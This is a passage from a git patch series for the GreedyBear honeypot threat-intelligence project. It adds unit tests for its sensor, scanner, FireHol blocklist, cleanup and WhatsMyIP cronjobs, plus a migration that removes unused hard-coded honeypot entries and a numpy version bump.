- self.assertEqual(deleted_count, 1)
-
-
-class TestMassScannerRepository(CustomTestCase):
- """Tests for MassScannerRepository."""
-
- def setUp(self):
- self.repo = MassScannerRepository()
-
- def test_get_or_create_creates_new_entry(self):
- scanner, created = self.repo.get_or_create("1.2.3.4", "test scanner")
-
- self.assertTrue(created)
- self.assertEqual(scanner.ip_address, "1.2.3.4")
- self.assertEqual(scanner.reason, "test scanner")
- self.assertTrue(MassScanner.objects.filter(ip_address="1.2.3.4").exists())
-
- def test_get_or_create_returns_existing(self):
- MassScanner.objects.create(ip_address="5.6.7.8", reason="existing")
-
- scanner, created = self.repo.get_or_create("5.6.7.8", "new reason")
-
- self.assertFalse(created)
- self.assertEqual(scanner.ip_address, "5.6.7.8")
- # Should keep original reason, not update it
- self.assertEqual(scanner.reason, "existing")
- self.assertEqual(MassScanner.objects.filter(ip_address="5.6.7.8").count(), 1)
-
- def test_get_or_create_without_reason(self):
- scanner, created = self.repo.get_or_create("7.7.7.7")
-
- self.assertTrue(created)
- self.assertEqual(scanner.ip_address, "7.7.7.7")
- self.assertEqual(scanner.reason, "")
diff --git a/tests/test_sensor_repository.py b/tests/test_sensor_repository.py
new file mode 100644
index 00000000..1220ad4a
--- /dev/null
+++ b/tests/test_sensor_repository.py
@@ -0,0 +1,58 @@
+from greedybear.cronjobs.repositories import SensorRepository
+from greedybear.models import Sensor
+
+from . import CustomTestCase
+
+
+class TestSensorRepository(CustomTestCase):
+ def setUp(self):
+ self.repo = SensorRepository()
+
+ def test_sensors_property_returns_cached_sensors(self):
+ self.repo.add_sensor("192.168.1.1")
+ self.repo.add_sensor("192.168.1.2")
+ result = self.repo.sensors
+ self.assertEqual(len(result), 2)
+ self.assertIn("192.168.1.1", result)
+ self.assertIn("192.168.1.2", result)
+
+ def test_add_sensor_creates_new_sensor(self):
+ result = self.repo.add_sensor("192.168.1.3")
+ self.assertTrue(result)
+ self.assertTrue(Sensor.objects.filter(address="192.168.1.3").exists())
+ self.assertIn("192.168.1.3", self.repo.cache)
+
+ def test_add_sensor_returns_false_for_existing_sensor(self):
+ self.repo.add_sensor("192.168.1.1")
+ result = self.repo.add_sensor("192.168.1.1")
+ self.assertFalse(result)
+ self.assertEqual(Sensor.objects.filter(address="192.168.1.1").count(), 1)
+
+ def test_add_sensor_rejects_non_ip(self):
+ result = self.repo.add_sensor("not-an-ip")
+ self.assertFalse(result)
+ self.assertFalse(Sensor.objects.filter(address="not-an-ip").exists())
+
+ def test_add_sensor_rejects_domain(self):
+ result = self.repo.add_sensor("example.com")
+ self.assertFalse(result)
+ self.assertFalse(Sensor.objects.filter(address="example.com").exists())
+
+ def test_cache_populated_on_init(self):
+ Sensor.objects.create(address="192.168.1.1")
+ Sensor.objects.create(address="192.168.1.2")
+ repo = SensorRepository()
+ self.assertEqual(len(repo.cache), 2)
+ self.assertIn("192.168.1.1", repo.cache)
+ self.assertIn("192.168.1.2", repo.cache)
+
+ def test_add_sensor_updates_cache(self):
+ initial_cache_size = len(self.repo.cache)
+ self.repo.add_sensor("192.168.1.1")
+ self.assertEqual(len(self.repo.cache), initial_cache_size + 1)
+
+ def test_add_sensor_accepts_valid_ipv4(self):
+ test_ips = ["1.2.3.4", "192.168.1.1", "10.0.0.1", "8.8.8.8"]
+ for ip in test_ips:
+ result = self.repo.add_sensor(ip)
+ self.assertTrue(result)
From 7fb5a99ab251c3a34ec187f96bcbd15ab634f462 Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Tue, 13 Jan 2026 22:12:39 +0530
Subject: [PATCH 44/75] Tests(Firehol): Adding and improving tests for Firehol.
(#697)
* adding tests for fh
* refactor side effect method
* remove unecessary lines
* remove .return_value of get
---
tests/greedybear/cronjobs/test_firehol.py | 143 +++++++++++++++++++---
1 file changed, 125 insertions(+), 18 deletions(-)
diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
index bdbaefb5..b4d4a314 100644
--- a/tests/greedybear/cronjobs/test_firehol.py
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -1,5 +1,8 @@
+from datetime import datetime, timedelta
from unittest.mock import MagicMock, patch
+import requests
+
from greedybear.cronjobs.firehol import FireHolCron
from greedybear.models import FireHolList
from tests import CustomTestCase
@@ -7,43 +10,35 @@
class FireHolCronTestCase(CustomTestCase):
@patch("greedybear.cronjobs.firehol.requests.get")
- def test_run(self, mock_get):
+ def test_run_creates_all_firehol_entries(self, mock_get):
# Setup mock responses
mock_response_blocklist_de = MagicMock()
- mock_response_blocklist_de.status_code = 200
mock_response_blocklist_de.text = "# blocklist_de\n1.1.1.1\n2.2.2.2"
mock_response_greensnow = MagicMock()
- mock_response_greensnow.status_code = 200
mock_response_greensnow.text = "# greensnow\n3.3.3.3"
mock_response_bruteforceblocker = MagicMock()
- mock_response_bruteforceblocker.status_code = 200
mock_response_bruteforceblocker.text = "# bruteforceblocker\n1.1.1.1"
mock_response_dshield = MagicMock()
- mock_response_dshield.status_code = 200
mock_response_dshield.text = "# dshield\n4.4.4.0/24"
# Side effect for multiple calls
- def side_effect(url, timeout):
- if "blocklist_de" in url:
- return mock_response_blocklist_de
- elif "greensnow" in url:
- return mock_response_greensnow
- elif "bruteforceblocker" in url:
- return mock_response_bruteforceblocker
- elif "dshield" in url:
- return mock_response_dshield
- return MagicMock(status_code=404)
-
- mock_get.side_effect = side_effect
+ mock_get.side_effect = self._firehol_get_side_effect(
+ {
+ "blocklist_de": mock_response_blocklist_de,
+ "greensnow": mock_response_greensnow,
+ "bruteforceblocker": mock_response_bruteforceblocker,
+ "dshield": mock_response_dshield,
+ }
+ )
# Run the cronjob
cronjob = FireHolCron()
cronjob.execute()
- # Check FireHolList entries were created
+ # Check that all FireHolList entries were created
self.assertTrue(FireHolList.objects.filter(ip_address="1.1.1.1", source="blocklist_de").exists())
self.assertTrue(FireHolList.objects.filter(ip_address="2.2.2.2", source="blocklist_de").exists())
self.assertTrue(FireHolList.objects.filter(ip_address="3.3.3.3", source="greensnow").exists())
@@ -57,3 +52,115 @@ def side_effect(url, timeout):
sources = list(firehol_entries.values_list("source", flat=True))
self.assertIn("blocklist_de", sources)
self.assertIn("bruteforceblocker", sources)
+
+ @patch("greedybear.cronjobs.firehol.requests.get")
+ def test_run_creates_some_firehol_entries(self, mock_get):
+ # Setup mock response
+ mock_response_blocklist_de = MagicMock()
+ mock_response_blocklist_de.text = "# blocklist_de\n1.1.1.1\n2.2.2.2"
+
+ mock_response_bruteforceblocker = MagicMock()
+ mock_response_bruteforceblocker.raise_for_status.side_effect = requests.exceptions.HTTPError("404 Client Error")
+
+ # Side effect for multiple calls
+ mock_get.side_effect = self._firehol_get_side_effect(
+ {
+ "blocklist_de": mock_response_blocklist_de,
+ "bruteforceblocker": mock_response_bruteforceblocker,
+ }
+ )
+
+ # Run the cronjob
+ cronjob = FireHolCron()
+ cronjob.log = MagicMock()
+ cronjob.execute()
+
+ # Check that some FireHolList entries were created
+ self.assertTrue(FireHolList.objects.filter(ip_address="1.1.1.1", source="blocklist_de").exists())
+ self.assertTrue(FireHolList.objects.filter(ip_address="2.2.2.2", source="blocklist_de").exists())
+ self.assertFalse(FireHolList.objects.filter(source="bruteforceblocker").exists())
+
+ @patch("greedybear.cronjobs.firehol.requests.get")
+ def test_run_creates_no_firehol_entries(self, mock_get):
+ # Setup mock response
+ mock_response_blocklist_de = MagicMock()
+ mock_response_blocklist_de.text = "# blocklist_de\n"
+
+ mock_response_bruteforceblocker = MagicMock()
+ mock_response_bruteforceblocker.raise_for_status.side_effect = requests.exceptions.HTTPError("404 Client Error")
+
+ # Side effect for multiple calls
+ mock_get.side_effect = self._firehol_get_side_effect(
+ {
+ "blocklist_de": mock_response_blocklist_de,
+ "bruteforceblocker": mock_response_bruteforceblocker,
+ }
+ )
+
+ # Run the cronjob
+ cronjob = FireHolCron()
+ cronjob.log = MagicMock()
+ cronjob.execute()
+
+ # Check that no FireHolList entries were created
+ self.assertFalse(FireHolList.objects.filter(source="blocklist_de").exists())
+ self.assertFalse(FireHolList.objects.filter(source="bruteforceblocker").exists())
+
+ @patch("greedybear.cronjobs.firehol.requests.get")
+ def test_run_handles_network_errors(self, mock_get):
+ # Setup mock to raise a network error
+ mock_get.side_effect = requests.exceptions.RequestException("Network error")
+
+ # Run the cronjob
+ cronjob = FireHolCron()
+ cronjob.log = MagicMock()
+ cronjob.execute()
+
+ cronjob.log.error.assert_called()
+ self.assertEqual(FireHolList.objects.count(), 0)
+
+ @patch("greedybear.cronjobs.firehol.requests.get")
+ def test_run_handles_raise_for_status_errors(self, mock_get):
+ # Setup mock to raise a 404 error
+ mock_response = MagicMock()
+ mock_response.raise_for_status.side_effect = requests.exceptions.HTTPError("404 Client Error")
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cronjob = FireHolCron()
+ cronjob.log = MagicMock()
+ cronjob.execute()
+
+ cronjob.log.error.assert_called()
+
+ def test_cleanup_old_entries(self):
+ now = datetime.now()
+
+ old_entry = FireHolList.objects.create(
+ ip_address="9.9.9.9",
+ source="blocklist_de",
+ added=now - timedelta(days=31),
+ )
+
+ new_entry = FireHolList.objects.create(
+ ip_address="8.8.8.8",
+ source="blocklist_de",
+ added=now - timedelta(days=10),
+ )
+
+ # Run the cronjob
+ cron = FireHolCron()
+ cron.log = MagicMock()
+ cron._cleanup_old_entries()
+
+ self.assertFalse(FireHolList.objects.filter(id=old_entry.id).exists())
+ self.assertTrue(FireHolList.objects.filter(id=new_entry.id).exists())
+
+ def _firehol_get_side_effect(self, side_effect_map):
+ def _side_effect(url, timeout):
+ for key, response in side_effect_map.items():
+ if key in url:
+ return response
+ raise requests.exceptions.HTTPError(f"Unhandled URL: {url}")
+
+ return _side_effect
From 004d461b3d8af049b02158f878546f1f8dfe8e7d Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 15 Jan 2026 08:43:36 +0100
Subject: [PATCH 45/75] Bump numpy from 2.4.0 to 2.4.1 in /requirements (#706)
Bumps [numpy](https://github.com/numpy/numpy) from 2.4.0 to 2.4.1.
- [Release notes](https://github.com/numpy/numpy/releases)
- [Changelog](https://github.com/numpy/numpy/blob/main/doc/RELEASE_WALKTHROUGH.rst)
- [Commits](https://github.com/numpy/numpy/compare/v2.4.0...v2.4.1)
---
updated-dependencies:
- dependency-name: numpy
dependency-version: 2.4.1
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot]
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
requirements/project-requirements.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 9c1ed53a..7b401e32 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -19,5 +19,5 @@ uwsgi==2.0.31
joblib==1.5.3
pandas==2.3.3
scikit-learn==1.8.0
-numpy==2.4.0
+numpy==2.4.1
datasketch==1.8.0
From f42b941ee9a110338f8fbf76ea8837610b8d45cb Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 15 Jan 2026 19:29:13 +0530
Subject: [PATCH 46/75] feat(tests): add comprehensive tests for cleanup.py.
Closes #699 (#705)
* feat(tests): add comprehensive tests for cleanup.py #699
* style(tests): use exact assertion for log counts in cleanup test
* fix(tests): patch retention settings to make tests deterministic
- Mock IOC_RETENTION, COMMAND_SEQUENCE_RETENTION, and COWRIE_SESSION_RETENTION
- Use fixed values (100, 90, 80 days) to ensure tests are environment-independent
- Remove dependency on settings module imports
- Addresses reviewer feedback about environment variable brittleness
* refactor(tests): improve datetime comparison robustness
- Replace assertAlmostEqual with manual timedelta calculations
- Use assertLess for clearer error messages on failure
- Convert to CustomTestCase for proper test fixture inheritance
- Addresses Copilot feedback about assertAlmostEqual with datetime objects
---
tests/greedybear/cronjobs/test_cleanup.py | 118 ++++++++++++++++++++++
1 file changed, 118 insertions(+)
create mode 100644 tests/greedybear/cronjobs/test_cleanup.py
diff --git a/tests/greedybear/cronjobs/test_cleanup.py b/tests/greedybear/cronjobs/test_cleanup.py
new file mode 100644
index 00000000..f99085b3
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_cleanup.py
@@ -0,0 +1,118 @@
+from datetime import datetime, timedelta
+from unittest.mock import MagicMock, patch
+
+from greedybear.cronjobs.cleanup import CleanUp
+from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository
+from tests import CustomTestCase
+
+
+class TestCleanUp(CustomTestCase):
+ def test_init_uses_default_repos(self):
+ """Test that the CleanUp job initializes with default repositories if none are provided."""
+ cleanup_job = CleanUp()
+ self.assertIsNotNone(cleanup_job.ioc_repo)
+ self.assertIsNotNone(cleanup_job.cowrie_repo)
+ self.assertIsInstance(cleanup_job.ioc_repo, IocRepository)
+ self.assertIsInstance(cleanup_job.cowrie_repo, CowrieSessionRepository)
+
+ @patch("greedybear.cronjobs.cleanup.IOC_RETENTION", 100)
+ @patch("greedybear.cronjobs.cleanup.COMMAND_SEQUENCE_RETENTION", 90)
+ @patch("greedybear.cronjobs.cleanup.COWRIE_SESSION_RETENTION", 80)
+ def test_run_calls_repository_methods_with_correct_dates(self):
+ """Test that run method calls repository deletion methods with correct retention dates."""
+ # Create mock repositories
+ ioc_repo = MagicMock()
+ cowrie_repo = MagicMock()
+
+ # Setup return values for logging purposes
+ ioc_repo.delete_old_iocs.return_value = 10
+ cowrie_repo.delete_old_command_sequences.return_value = 20
+ cowrie_repo.delete_incomplete_sessions.return_value = 5
+ cowrie_repo.delete_sessions_without_login.return_value = 15
+ cowrie_repo.delete_sessions_without_commands.return_value = 8
+
+ # Initialize CleanUp with mocks
+ cleanup_job = CleanUp(ioc_repo=ioc_repo, cowrie_repo=cowrie_repo)
+
+ # Mock the logger to verify logging calls
+ cleanup_job.log = MagicMock()
+
+ # Execute the run method
+ cleanup_job.run()
+
+ # Verify interactions with IocRepository
+ ioc_repo.delete_old_iocs.assert_called_once()
+ expected_ioc_date = datetime.now() - timedelta(days=100)
+ # Check that the date passed is approximately correct (within 1 second)
+ args, _ = ioc_repo.delete_old_iocs.call_args
+ actual_date = args[0]
+ time_diff = abs((actual_date - expected_ioc_date).total_seconds())
+ self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+ # Verify interactions with CowrieSessionRepository
+
+ # 1. delete_old_command_sequences
+ cowrie_repo.delete_old_command_sequences.assert_called_once()
+ expected_cmd_date = datetime.now() - timedelta(days=90)
+ args, _ = cowrie_repo.delete_old_command_sequences.call_args
+ actual_date = args[0]
+ time_diff = abs((actual_date - expected_cmd_date).total_seconds())
+ self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+ # 2. delete_incomplete_sessions
+ cowrie_repo.delete_incomplete_sessions.assert_called_once()
+
+ # 3. delete_sessions_without_login
+ cowrie_repo.delete_sessions_without_login.assert_called_once()
+ expected_session_login_date = datetime.now() - timedelta(days=30)
+ args, _ = cowrie_repo.delete_sessions_without_login.call_args
+ actual_date = args[0]
+ time_diff = abs((actual_date - expected_session_login_date).total_seconds())
+ self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+ # 4. delete_sessions_without_commands
+ cowrie_repo.delete_sessions_without_commands.assert_called_once()
+ expected_session_cmd_date = datetime.now() - timedelta(days=80)
+ args, _ = cowrie_repo.delete_sessions_without_commands.call_args
+ actual_date = args[0]
+ time_diff = abs((actual_date - expected_session_cmd_date).total_seconds())
+ self.assertLess(time_diff, 1, f"Date difference ({time_diff}s) exceeds 1 second tolerance")
+
+ # Verify logging messages
+ # We expect 5 pairs of logs (start + result)
+ # 10 calls to info level
+ self.assertEqual(cleanup_job.log.info.call_count, 10)
+
+ # Check specific log messages to ensure counts are logged
+ cleanup_job.log.info.assert_any_call("10 objects deleted")
+ cleanup_job.log.info.assert_any_call("20 objects deleted")
+ cleanup_job.log.info.assert_any_call("5 objects deleted")
+ cleanup_job.log.info.assert_any_call("15 objects deleted")
+ cleanup_job.log.info.assert_any_call("8 objects deleted")
+
+ def test_run_handles_zero_deletions(self):
+ """Test that run method handles cases where no objects are deleted."""
+ ioc_repo = MagicMock()
+ cowrie_repo = MagicMock()
+
+ # Setup return values as 0
+ ioc_repo.delete_old_iocs.return_value = 0
+ cowrie_repo.delete_old_command_sequences.return_value = 0
+ cowrie_repo.delete_incomplete_sessions.return_value = 0
+ cowrie_repo.delete_sessions_without_login.return_value = 0
+ cowrie_repo.delete_sessions_without_commands.return_value = 0
+
+ cleanup_job = CleanUp(ioc_repo=ioc_repo, cowrie_repo=cowrie_repo)
+ cleanup_job.log = MagicMock()
+
+ cleanup_job.run()
+
+ # Verify invocations still happen
+ ioc_repo.delete_old_iocs.assert_called_once()
+ cowrie_repo.delete_old_command_sequences.assert_called_once()
+ cowrie_repo.delete_incomplete_sessions.assert_called_once()
+ cowrie_repo.delete_sessions_without_login.assert_called_once()
+ cowrie_repo.delete_sessions_without_commands.assert_called_once()
+
+ # Verify zero counts are logged
+ cleanup_job.log.info.assert_any_call("0 objects deleted")
From fc9fb6d7f5271314f5f4a1ee66bc603ade2d323b Mon Sep 17 00:00:00 2001
From: Sumit Das
Date: Sun, 18 Jan 2026 15:45:12 +0530
Subject: [PATCH 47/75] Add migration to remove hard-coded honeypots. Fixes
#632 (#717)
* Add migration to remove hard-coded honeypots. Fixes #632
* Fix migration conflict: renumber to 0029 and add dependency on 0028
---------
Co-authored-by: SUMIT DAS
---
.../0029_remove_hardcoded_honeypots.py | 57 +++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 greedybear/migrations/0029_remove_hardcoded_honeypots.py
diff --git a/greedybear/migrations/0029_remove_hardcoded_honeypots.py b/greedybear/migrations/0029_remove_hardcoded_honeypots.py
new file mode 100644
index 00000000..1adf481b
--- /dev/null
+++ b/greedybear/migrations/0029_remove_hardcoded_honeypots.py
@@ -0,0 +1,57 @@
+# Generated by Django 5.2.10
+
+from django.db import migrations
+
+
+def remove_hardcoded_honeypots(apps, schema_editor):
+ """
+ Remove hard-coded honeypots from migration 0008 if they are not in use.
+
+ Only deletes honeypots with no associated IOC data .
+ """
+ GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+ IOC = apps.get_model("greedybear", "IOC")
+
+ # The 15 honeypots that were hard-coded in migration 0008
+ old_honeypots = [
+ "Heralding",
+ "Ciscoasa",
+ "Honeytrap",
+ "Dionaea",
+ "ConPot",
+ "Adbhoney",
+ "Tanner",
+ "CitrixHoneypot",
+ "Mailoney",
+ "Ipphoney",
+ "Ddospot",
+ "ElasticPot",
+ "Dicompot",
+ "Redishoneypot",
+ "Sentrypeer",
+ "Glutton",
+ ]
+
+ for hp_name in old_honeypots:
+ try:
+ honeypot = GeneralHoneypot.objects.get(name=hp_name)
+ # Only delete if NOT in use (no IOCs associated with this honeypot)
+ if not IOC.objects.filter(general_honeypot=honeypot).exists():
+ honeypot.delete()
+ except GeneralHoneypot.DoesNotExist:
+ # Honeypot doesn't exist, nothing to delete
+ pass
+
+
+class Migration(migrations.Migration):
+ dependencies = [
+ ("greedybear", "0027_disable_unwanted_honeypots"),
+ ("greedybear", "0028_generalhoneypot_unique_generalhoneypot_name_ci"),
+ ]
+
+ operations = [
+ migrations.RunPython(
+ remove_hardcoded_honeypots,
+ reverse_code=migrations.RunPython.noop,
+ ),
+ ]
From e72f5053e2f10ca5ef6d422ed81b456ef4610685 Mon Sep 17 00:00:00 2001
From: RAVI TEJA BHAGAVATULA
Date: Mon, 19 Jan 2026 12:04:02 +0530
Subject: [PATCH 48/75] Fix #700: Standardize test base class inheritance
(#714)
---
.../greedybear/cronjobs/test_monitor_logs.py | 4 +--
tests/test_cowrie_extraction.py | 6 ++--
tests/test_ntfy.py | 6 ++--
tests/test_rf_config.py | 5 ++-
tests/test_serializers.py | 36 +++++++------------
5 files changed, 23 insertions(+), 34 deletions(-)
diff --git a/tests/greedybear/cronjobs/test_monitor_logs.py b/tests/greedybear/cronjobs/test_monitor_logs.py
index 9c3052e6..ed3cff8f 100644
--- a/tests/greedybear/cronjobs/test_monitor_logs.py
+++ b/tests/greedybear/cronjobs/test_monitor_logs.py
@@ -1,11 +1,11 @@
from datetime import datetime, timedelta
-from unittest import TestCase
from unittest.mock import MagicMock, patch
from greedybear.cronjobs.monitor_logs import MonitorLogs
+from tests import CustomTestCase
-class MonitorLogsTestCase(TestCase):
+class MonitorLogsTestCase(CustomTestCase):
@patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
@patch("greedybear.cronjobs.monitor_logs.send_slack_message")
@patch("greedybear.cronjobs.monitor_logs.Path.exists")
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
index 87e36ff3..1a9b96fe 100644
--- a/tests/test_cowrie_extraction.py
+++ b/tests/test_cowrie_extraction.py
@@ -2,7 +2,6 @@
Tests for Cowrie extraction helper functions and strategy.
"""
-from unittest import TestCase
from unittest.mock import MagicMock, Mock, patch
from greedybear.cronjobs.extraction.strategies.cowrie import (
@@ -12,9 +11,10 @@
parse_url_hostname,
)
from greedybear.models import CommandSequence
+from tests import ExtractionTestCase
-class TestHelperFunctions(TestCase):
+class TestHelperFunctions(ExtractionTestCase):
"""Test standalone helper functions."""
def test_parse_url_hostname_valid_http(self):
@@ -75,7 +75,7 @@ def test_normalize_credential_field_clean(self):
self.assertEqual(result, "admin")
-class TestCowrieExtractionStrategy(TestCase):
+class TestCowrieExtractionStrategy(ExtractionTestCase):
"""Test CowrieExtractionStrategy class."""
def setUp(self):
diff --git a/tests/test_ntfy.py b/tests/test_ntfy.py
index de4c7c9c..f7f2dcd2 100644
--- a/tests/test_ntfy.py
+++ b/tests/test_ntfy.py
@@ -1,17 +1,17 @@
from unittest.mock import MagicMock, patch
-from django.test import SimpleTestCase, override_settings
+from django.test import override_settings
from greedybear.ntfy import send_ntfy_message
+from tests import CustomTestCase
TEST_LOGGING = {
"version": 1,
"disable_existing_loggers": True,
}
-
@override_settings(LOGGING=TEST_LOGGING)
-class SendNtfyMessageTests(SimpleTestCase):
+class SendNtfyMessageTests(CustomTestCase):
@override_settings(NTFY_URL="https://ntfy.sh/greedybear")
@patch("greedybear.ntfy.requests.post")
@patch("greedybear.ntfy.logger")
diff --git a/tests/test_rf_config.py b/tests/test_rf_config.py
index 4b597a71..39be6ff2 100644
--- a/tests/test_rf_config.py
+++ b/tests/test_rf_config.py
@@ -1,12 +1,11 @@
import json
-from django.test import SimpleTestCase
-
from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
from greedybear.settings import ML_CONFIG_FILE
+from tests import CustomTestCase
-class TestRFConfig(SimpleTestCase):
+class TestRFConfig(CustomTestCase):
def setUp(self):
with open(ML_CONFIG_FILE) as f:
self.config = json.load(f)
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index 44b3beec..e7861e25 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -1,26 +1,21 @@
import random
from itertools import product
-from django.test import TestCase
from rest_framework.serializers import ValidationError
from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
from greedybear.consts import PAYLOAD_REQUEST, SCANNER
from greedybear.models import IOC, GeneralHoneypot
+from tests import CustomTestCase
-class FeedsRequestSerializersTestCase(TestCase):
+class FeedsRequestSerializersTestCase(CustomTestCase):
@classmethod
- def setUpClass(cls):
- GeneralHoneypot.objects.create(
- name="adbhoney",
- active=True,
- )
-
- @classmethod
- def tearDownClass(cls):
- # db clean
- GeneralHoneypot.objects.all().delete()
+ def setUpTestData(cls):
+ super().setUpTestData()
+ cls.adbhoney = GeneralHoneypot.objects.filter(name__iexact="adbhoney").first()
+ if not cls.adbhoney:
+ cls.adbhoney = GeneralHoneypot.objects.create(name="Adbhoney", active=True)
def test_valid_fields(self):
choices = {
@@ -92,18 +87,13 @@ def test_invalid_fields(self):
self.assertIn("format", serializer.errors)
-class FeedsResponseSerializersTestCase(TestCase):
- @classmethod
- def setUpClass(cls):
- GeneralHoneypot.objects.create(
- name="adbhoney",
- active=True,
- )
-
+class FeedsResponseSerializersTestCase(CustomTestCase):
@classmethod
- def tearDownClass(cls):
- # db clean
- GeneralHoneypot.objects.all().delete()
+ def setUpTestData(cls):
+ super().setUpTestData()
+ cls.adbhoney = GeneralHoneypot.objects.filter(name__iexact="adbhoney").first()
+ if not cls.adbhoney:
+ cls.adbhoney = GeneralHoneypot.objects.create(name="Adbhoney", active=True)
def test_valid_fields(self):
scanner_choices = [True, False]
From e934f442e85bd49ddb7d36e0a6748c3d64dffbc9 Mon Sep 17 00:00:00 2001
From: Shivraj Suman <79820642+shivraj1182@users.noreply.github.com>
Date: Mon, 19 Jan 2026 12:28:28 +0530
Subject: [PATCH 49/75] feat(tests): add comprehensive tests for WhatsMyIPCron.
Closes #708 (#716)
* feat(tests): add comprehensive tests for WhatsMyIPCron. Closes #708
* refactor: use CustomTestCase and move test to run automatically
- Changed base class from TestCase to CustomTestCase
- Removed setUp and tearDown methods (not needed with CustomTestCase)
- Moved test file from only_manual to cronjobs folder to run automatically
Addresses review feedback from @regulartim
* Update test_whatsmyip.py (replaced whatsmyip with whatsmyipdomain)
* Update test_whatsmyip.py
---
tests/greedybear/cronjobs/test_whatsmyip.py | 136 ++++++++++++++++++++
1 file changed, 136 insertions(+)
create mode 100644 tests/greedybear/cronjobs/test_whatsmyip.py
diff --git a/tests/greedybear/cronjobs/test_whatsmyip.py b/tests/greedybear/cronjobs/test_whatsmyip.py
new file mode 100644
index 00000000..51586b13
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_whatsmyip.py
@@ -0,0 +1,136 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+
+from tests import CustomTestCase
+from unittest.mock import patch, MagicMock
+
+from greedybear.cronjobs import whatsmyip
+from greedybear.models import IOC, WhatsMyIPDomain
+
+
+class WhatsMyIPTestCase(CustomTestCase):
+ """Test WhatsMyIPCron cronjob"""
+
+ @patch("greedybear.cronjobs.whatsmyip.requests.get")
+ def test_add_new_domains(self, mock_get):
+ """Test adding new domains from MISP warning list"""
+ # Mock the HTTP response
+ mock_response = MagicMock()
+ mock_response.json.return_value = {
+ "list": ["test-domain-1.com", "test-domain-2.com"]
+ }
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cron = whatsmyip.WhatsMyIPCron()
+ cron.run()
+
+ # Verify domains were added
+ self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
+ self.assertTrue(
+ WhatsMyIPDomain.objects.filter(domain="test-domain-1.com").exists()
+ )
+ self.assertTrue(
+ WhatsMyIPDomain.objects.filter(domain="test-domain-2.com").exists()
+ )
+
+ @patch("greedybear.cronjobs.whatsmyip.requests.get")
+ def test_skip_existing_domains(self, mock_get):
+ """Test that existing domains are skipped"""
+ # Add an existing domain
+ existing_domain = WhatsMyIPDomain.objects.create(domain="existing-domain.com")
+
+ # Mock the HTTP response with existing and new domains
+ mock_response = MagicMock()
+ mock_response.json.return_value = {
+ "list": ["existing-domain.com", "new-domain.com"]
+ }
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cron = whatsmyip.WhatsMyIPCron()
+ cron.run()
+
+ # Verify only new domain was added
+ self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
+ self.assertEqual(
+ WhatsMyIPDomain.objects.get(domain="existing-domain.com").id, existing_domain.id
+ )
+ self.assertTrue(
+ WhatsMyIPDomain.objects.filter(domain="new-domain.com").exists()
+ )
+
+ @patch("greedybear.cronjobs.whatsmyip.requests.get")
+ def test_remove_old_ioc_records(self, mock_get):
+ """Test that old IOC records are cleaned up"""
+ # Create an IOC record for a domain
+ domain_name = "cleanup-domain.com"
+ ioc = IOC.objects.create(name=domain_name)
+
+ # Mock the HTTP response
+ mock_response = MagicMock()
+ mock_response.json.return_value = {"list": [domain_name]}
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cron = whatsmyip.WhatsMyIPCron()
+ cron.run()
+
+ # Verify IOC record was deleted
+ self.assertFalse(IOC.objects.filter(id=ioc.id).exists())
+ self.assertTrue(
+ WhatsMyIPDomain.objects.filter(domain=domain_name).exists()
+ )
+
+ @patch("greedybear.cronjobs.whatsmyip.requests.get")
+ def test_handle_missing_ioc_gracefully(self, mock_get):
+ """Test that missing IOC records don't cause errors"""
+ # Mock the HTTP response
+ mock_response = MagicMock()
+ mock_response.json.return_value = {"list": ["domain-with-no-ioc.com"]}
+ mock_get.return_value = mock_response
+
+ # Run the cronjob - should not raise exception
+ cron = whatsmyip.WhatsMyIPCron()
+ cron.run()
+
+ # Verify domain was added
+ self.assertTrue(
+ WhatsMyIPDomain.objects.filter(domain="domain-with-no-ioc.com").exists()
+ )
+
+ @patch("greedybear.cronjobs.whatsmyip.requests.get")
+ def test_empty_domain_list(self, mock_get):
+ """Test handling of empty domain list"""
+ # Mock the HTTP response with empty list
+ mock_response = MagicMock()
+ mock_response.json.return_value = {"list": []}
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cron = whatsmyip.WhatsMyIPCron()
+ cron.run()
+
+ # Verify no domains were added
+ self.assertEqual(WhatsMyIPDomain.objects.count(), 0)
+
+ @patch("greedybear.cronjobs.whatsmyip.requests.get")
+ def test_http_request_parameters(self, mock_get):
+ """Test that HTTP request is made with correct parameters"""
+ # Mock the HTTP response
+ mock_response = MagicMock()
+ mock_response.json.return_value = {"list": []}
+ mock_get.return_value = mock_response
+
